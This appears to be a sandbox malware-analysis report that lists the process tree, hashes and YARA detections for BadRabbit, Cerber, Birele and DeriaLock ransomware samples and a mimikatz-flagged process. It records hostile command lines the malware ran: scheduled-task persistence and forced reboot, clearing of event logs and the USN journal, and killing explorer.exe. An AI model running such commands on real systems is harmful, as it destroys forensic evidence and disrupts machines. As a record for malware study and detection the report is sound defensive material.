Yara matches:	Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: 00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Christiaan Beek
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: Endermanch@BadRabbit.exePID: 5388, Parent PID: 3220

General

Target ID:	4
Start time:	14:49:55
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
Imagebase:	0x1320000
File size:	441899 bytes
MD5 hash:	FBBDC39AF1139AEBBA4DA004475E8839
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5492, Parent PID: 576

General

Target ID:	5
Start time:	14:49:59
Start date:	29/09/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff603c50000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5524, Parent PID: 576

General

Target ID:	6
Start time:	14:49:59
Start date:	29/09/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff603c50000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5324, Parent PID: 5388

General

Target ID:	7
Start time:	14:50:00
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: Endermanch@Birele.exePID: 5576, Parent PID: 3220

General

Target ID:	8
Start time:	14:50:00
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
Imagebase:	0x400000
File size:	119296 bytes
MD5 hash:	41789C704A0EECFDD0048B4B4193E752
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 86%, ReversingLabs Detection: 78%, Metadefender, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2212, Parent PID: 5388

General

Target ID:	9
Start time:	14:50:01
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Imagebase:	0x850000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: Endermanch@BadRabbit.exePID: 3140, Parent PID: 3220

General

Target ID:	10
Start time:	14:50:01
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
Imagebase:	0x1320000
File size:	441899 bytes
MD5 hash:	FBBDC39AF1139AEBBA4DA004475E8839
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4112, Parent PID: 5364

General

Target ID:	11
Start time:	14:50:02
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c schtasks /Delete /F /TN rhaegal
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 5484, Parent PID: 5576

General

Target ID:	12
Start time:	14:50:02
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM explorer.exe
Imagebase:	0x990000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3320, Parent PID: 5484

General

Target ID:	13
Start time:	14:50:02
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: Endermanch@Birele.exePID: 4668, Parent PID: 3220

General

Target ID:	14
Start time:	14:50:03
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
Imagebase:	0x400000
File size:	119296 bytes
MD5 hash:	41789C704A0EECFDD0048B4B4193E752
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2392, Parent PID: 3140

General

Target ID:	15
Start time:	14:50:03
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2232, Parent PID: 4112

General

Target ID:	17
Start time:	14:50:03
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 1408, Parent PID: 4112

General

Target ID:	18
Start time:	14:50:04
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /Delete /F /TN rhaegal
Imagebase:	0x9f0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: Endermanch@Cerber5.exePID: 5148, Parent PID: 3220

General

Target ID:	19
Start time:	14:50:05
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"
Imagebase:	0x400000
File size:	320760 bytes
MD5 hash:	FE1BC60A95B2C2D77CD5D232296A7FA4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Cerber, Description: Cerber Payload, Source: 00000013.00000002.412053021.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Cerber, Description: Cerber Payload, Source: 00000013.00000002.459335598.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: cerber3, Description: Cerber3 , Source: 00000013.00000000.299020841.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo Rule: cerber3, Description: Cerber3 , Source: 00000013.00000000.301994770.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo Rule: cerber3, Description: Cerber3 , Source: 00000013.00000000.299998392.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo Rule: Cerber, Description: Cerber Payload, Source: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: cerber3, Description: Cerber3 , Source: 00000013.00000000.303477710.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, Author: pekeinfo
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 91%, ReversingLabs Detection: 76%, Metadefender, Browse

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2364, Parent PID: 5364

General

Target ID:	20
Start time:	14:50:05
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 4500, Parent PID: 4668

General

Target ID:	21
Start time:	14:50:05
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM explorer.exe
Imagebase:	0x990000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4912, Parent PID: 4500

General

Target ID:	22
Start time:	14:50:06
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5712, Parent PID: 2364

General

Target ID:	23
Start time:	14:50:06
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5128, Parent PID: 5364

General

Target ID:	24
Start time:	14:50:06
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2224, Parent PID: 2364

General

Target ID:	25
Start time:	14:50:06
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit"
Imagebase:	0x9f0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6056, Parent PID: 5128

General

Target ID:	26
Start time:	14:50:07
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: 5753.tmpPID: 4948, Parent PID: 5364

General

Target ID:	27
Start time:	14:50:07
Start date:	29/09/2022
Path:	C:\Windows\5753.tmp
Wow64 process (32bit):	false
Commandline:	"C:\Windows\5753.tmp" \\.\pipe\{BA7DC5E0-29E5-4FCA-A986-C2C71FD14928}
Imagebase:	0x7ff7cef20000
File size:	62328 bytes
MD5 hash:	347AC3B6B791054DE3E5720A7144A977
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: mimikatz, Description: mimikatz, Source: 0000001B.00000000.303576856.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp, Author: Benjamin DELPY (gentilkiwi) Rule: mimikatz, Description: mimikatz, Source: 0000001B.00000000.302953795.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp, Author: Benjamin DELPY (gentilkiwi) Rule: mimikatz, Description: mimikatz, Source: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp, Author: Benjamin DELPY (gentilkiwi) Rule: mimikatz, Description: mimikatz, Source: 0000001B.00000000.303401011.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp, Author: Benjamin DELPY (gentilkiwi)

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5480, Parent PID: 576

General

Target ID:	28
Start time:	14:50:07
Start date:	29/09/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff603c50000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2404, Parent PID: 5128

General

Target ID:	29
Start time:	14:50:07
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00
Imagebase:	0x9f0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5624, Parent PID: 4948

General

Target ID:	30
Start time:	14:50:07
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5420, Parent PID: 1064

General

Target ID:	31
Start time:	14:50:08
Start date:	29/09/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1446829312 && exit
Imagebase:	0x7ff7cb270000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: Endermanch@BadRabbit.exePID: 5460, Parent PID: 3220

General

Target ID:	32
Start time:	14:50:08
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
Imagebase:	0x1320000
File size:	441899 bytes
MD5 hash:	FBBDC39AF1139AEBBA4DA004475E8839
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5356, Parent PID: 576

General

Target ID:	33
Start time:	14:50:09
Start date:	29/09/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff603c50000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5632, Parent PID: 5420

General

Target ID:	34
Start time:	14:50:22
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4152, Parent PID: 5364

General

Target ID:	35
Start time:	14:50:09
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4688, Parent PID: 5460

General

Target ID:	36
Start time:	14:50:12
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1816, Parent PID: 4152

General

Target ID:	37
Start time:	14:50:12
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: Endermanch@Birele.exePID: 3532, Parent PID: 3220

General

Target ID:	38
Start time:	14:50:10
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
Imagebase:	0x400000
File size:	119296 bytes
MD5 hash:	41789C704A0EECFDD0048B4B4193E752
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi

Show Windows behavior

Chronological Activities

Analysis Process: netsh.exePID: 3584, Parent PID: 5148

General

Target ID:	39
Start time:	14:50:10
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
Imagebase:	0x970000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: Endermanch@Cerber5.exePID: 3592, Parent PID: 3220

General

Target ID:	40
Start time:	14:50:11
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"
Imagebase:	0x400000
File size:	320760 bytes
MD5 hash:	FE1BC60A95B2C2D77CD5D232296A7FA4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: cerber3, Description: Cerber3 , Source: 00000028.00000000.314208666.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo Rule: cerber3, Description: Cerber3 , Source: 00000028.00000000.312282421.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo Rule: Cerber, Description: Cerber Payload, Source: 00000028.00000002.329104231.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Cerber, Description: Cerber Payload, Source: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: cerber3, Description: Cerber3 , Source: 00000028.00000000.312879365.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo Rule: cerber3, Description: Cerber3 , Source: 00000028.00000000.311585156.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo Rule: Cerber, Description: Cerber Payload, Source: 00000028.00000002.331419258.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 3664, Parent PID: 3532

General

Target ID:	41
Start time:	14:50:12
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM explorer.exe
Imagebase:	0x990000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4864, Parent PID: 3664

General

Target ID:	42
Start time:	14:50:13
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3720, Parent PID: 3584

General

Target ID:	43
Start time:	14:50:13
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: Endermanch@DeriaLock.exePID: 3576, Parent PID: 3220

General

Target ID:	44
Start time:	14:50:13
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe"
Imagebase:	0xd80000
File size:	495616 bytes
MD5 hash:	0A7B70EFBA0AA93D4BC0857B87AC2FCB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs Detection: 69%, Metadefender, Browse

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3500, Parent PID: 5364

General

Target ID:	45
Start time:	14:50:13
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c schtasks /Delete /F /TN drogon
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2844, Parent PID: 3500

General

Target ID:	46
Start time:	14:50:14
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2852, Parent PID: 5460

General

Target ID:	47
Start time:	14:50:14
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Imagebase:	0x850000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wevtutil.exePID: 4996, Parent PID: 4152

General

Target ID:	48
Start time:	14:50:14
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\wevtutil.exe
Wow64 process (32bit):	true
Commandline:	wevtutil cl Setup
Imagebase:	0x1100000
File size:	167936 bytes
MD5 hash:	27C3944EC1E3CAD62641ECBCEB107EE9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: Endermanch@BadRabbit.exePID: 5332, Parent PID: 3220

General

Target ID:	49
Start time:	14:50:14
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
Imagebase:	0x1320000
File size:	441899 bytes
MD5 hash:	FBBDC39AF1139AEBBA4DA004475E8839
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2564, Parent PID: 3500

General

Target ID:	50
Start time:	14:50:15
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /Delete /F /TN drogon
Imagebase:	0x9f0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: netsh.exePID: 4812, Parent PID: 5148

General

Target ID:	51
Start time:	14:50:18
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\netsh.exe advfirewall reset
Imagebase:	0x970000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5324, Parent PID: 4812

General

Target ID:	52
Start time:	14:50:19
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wevtutil.exePID: 60, Parent PID: 4152

General

Target ID:	53
Start time:	14:50:19
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\wevtutil.exe
Wow64 process (32bit):	true
Commandline:	wevtutil cl System
Imagebase:	0x1100000
File size:	167936 bytes
MD5 hash:	27C3944EC1E3CAD62641ECBCEB107EE9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 1268, Parent PID: 576

General

Target ID:	54
Start time:	14:50:19
Start date:	29/09/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff603c50000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
